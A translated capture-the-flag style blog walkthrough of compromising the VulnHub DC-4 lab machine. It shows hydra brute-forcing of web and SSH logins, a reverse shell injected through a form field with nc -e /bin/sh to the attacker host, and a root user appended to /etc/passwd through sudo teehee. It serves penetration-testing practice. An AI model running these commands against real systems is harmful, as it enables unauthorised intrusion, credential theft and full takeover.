【Try to Hack】vulnhub DC4
2022-07-01 16:28:00 【开心星人】
Blog home page: 开心星人's blog home page
Series column: Try to Hack
First published: July 1, 2022
The author's skill is very limited; if you find any errors, please let me know. Thank you!
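The target VM defaults to bridged mode.
Kali is set to bridged mode.
Host discovery:
netdiscover
The target's IP is 192.168.0.151.
nmap -p- -A 192.168.0.151
SSH and HTTP services are open.
Visit port 80.
Routine directory scan with dirb:
dirb http://192.168.0.151
Two directories return 403.
whatweb http://192.168.0.151
cewl cannot crawl this page to build a wordlist.
Try weak passwords.
Use hydra with the wordlist that ships with john, /usr/share/john/password.lst.
The username is known to be admin:
hydra -l admin -P /usr/share/john/password.lst 192.168.0.151 http-get /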
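Commands can be executed, but the command is hard-coded.
Capture the request and take a look.
That is indeed the case.
Get a reverse shell:
radio=nc+192.168.0.106+233+-e+/bin/sh&submit=Run
nc -lvvp 233
Forward the request.
python -c 'import pty;pty.spawn("/bin/bash")'
This gives an interactive shell.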
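ls /home
There are three users.
Go through them one by one.
Only jim's can be read.
There are passwords.
Keep going through the other files under jim.
No permission to view mbox.
Now look at the SSH service.
Then save the three users as user.txt.
I copied the password backup file by hand to the Kali attack machine.
Brute-force the SSH service with hydra:
hydra -L user.txt -P password.txt 192.168.0.151 ssh -t 60
The SSH brute force turns up one user:
jim:jibril04
Log in and take a look:
ssh [email protected]
Login succeeds.
mbox can now be viewed.
This is an email, sent by root to jim, but there is no mail content.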
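Found in /var/jim. (This /var/mail is a folder that exists by default; it may be what is used to store mail.)
Got charles's password.
Log in and take a look.
Found nothing.
Now the only option is privilege escalation.
We were given the charles user, so use this user to escalate.
test.sh has the SUID bit set, but I don't know when it runs; I have never seen it run.
My first thought was to escalate with ping, but it doesn't seem to work.
Use sudo:
sudo -l
echo "happy::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
This constructs a user with root privileges and writes it into /etc/passwd.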